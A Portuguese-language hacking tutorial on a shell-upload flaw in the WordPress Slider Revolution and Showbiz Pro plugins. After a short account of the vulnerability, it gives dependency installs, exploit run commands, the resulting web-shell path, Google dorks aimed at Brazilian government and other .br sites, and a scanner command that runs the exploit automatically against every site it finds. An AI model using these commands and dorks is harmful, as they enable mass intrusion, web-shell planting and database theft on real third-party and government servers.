0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit
Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.
[INFO INTERNA DO EXPLOIT]{
Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)
}
Download:
Exploit:
Exploit update zip files:
Dependências de para uso:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'
For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay
Começando a exploração
Primeiro baixaremos o exploit http://1337day.com/exploit/22938
No código do exploit encontramos dois zip's citados acima para baixar:
Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.
Mãos a obra
0x Comando / Demo:
- perl exploit.pl <target> <plugin>
- perl exploit.pl http://localhost revslider
- perl exploit.pl http://localhost showbiz
- perl exploit.pl http://localhost revslider
A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
(os locais com __PLUGIN__ é o nome do plugin escolhido),
Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.
A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".
DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/
Comando compatível com SCANNER INURLBR:
./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'
OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear');
SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR
